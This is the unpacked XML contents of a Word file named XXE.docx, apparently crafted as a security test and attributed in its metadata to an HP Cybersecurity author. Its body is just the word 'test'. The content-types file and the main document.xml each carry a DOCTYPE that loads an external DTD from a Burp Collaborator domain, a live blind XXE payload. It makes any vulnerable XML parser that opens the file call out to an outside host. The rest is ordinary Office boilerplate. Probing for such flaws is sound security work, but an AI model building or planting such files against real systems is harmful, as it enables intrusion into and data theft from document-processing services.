
<file path=XXE.docx/[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo
  SYSTEM 'http://shdg0lg7x8lv0fm4m3ewkvrj8ae22r.burpcollaborator.net/test.dtd'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XXE.docx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XXE.docx/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XXE.docx/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XXE.docx/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XXE.docx/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626372F0E1441907B079ED95093D2" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="c502e03ddf14c5d8356637d6fa29cb8a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="ac811855-d4ae-4400-82cf-8fb1172f4f79" xmlns:ns4="b1308335-ac9b-46a7-96b8-f26f0542bb42" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7b47563bc93d3f0c2edc387726687a65" ns3:_="" ns4:_="">
    <xsd:import namespace="ac811855-d4ae-4400-82cf-8fb1172f4f79"/>
    <xsd:import namespace="b1308335-ac9b-46a7-96b8-f26f0542bb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11855-d4ae-4400-82cf-8fb1172f4f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08335-ac9b-46a7-96b8-f26f0542b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XXE.docx/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XXE.docx/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XXE.docx/customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{681E5F14-3056-4933-BA96-A88A24B8D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811855-d4ae-4400-82cf-8fb1172f4f79"/>
    <ds:schemaRef ds:uri="b1308335-ac9b-46a7-96b8-f26f0542b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XXE.docx/customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{47E52902-B80E-4719-849C-D4E2CEC1160F}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=XXE.docx/customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C598D2D5-47DB-4873-8D72-EBAA10C33515}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="ac811855-d4ae-4400-82cf-8fb1172f4f7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b1308335-ac9b-46a7-96b8-f26f0542bb42"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=XXE.docx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XXE.docx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Iramar, Ricardo (HP Cybersecurity)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Iramar, Ricardo (HP Cybersecurity)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2019-06-19T13:09:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-30T19:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-30T19:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=XXE.docx/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0x01010042E626372F0E1441907B079ED95093D2</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=XXE.docx/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XXE.docx/word/document.xml><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo
  SYSTEM 'http://doc.shdg0lg7x8lv0fm4m3ewkvrj8ae22r.burpcollaborator.net/test.dtd'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DF5C5" w14:textId="71B499F5" w:rsidR="00395E87" w:rsidRDefault="008041F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00395E87" w:rsidSect="00464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XXE.docx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XXE.docx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83"/>
    <w:rsid w:val="00287007"/>
    <w:rsid w:val="00395E87"/>
    <w:rsid w:val="00464A83"/>
    <w:rsid w:val="0080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617A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65045C49-2D08-4B35-ABA3-A09E1561C84C}"/>
</w:settings>
</file>

<file path=XXE.docx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1F0"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=XXE.docx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XE.docx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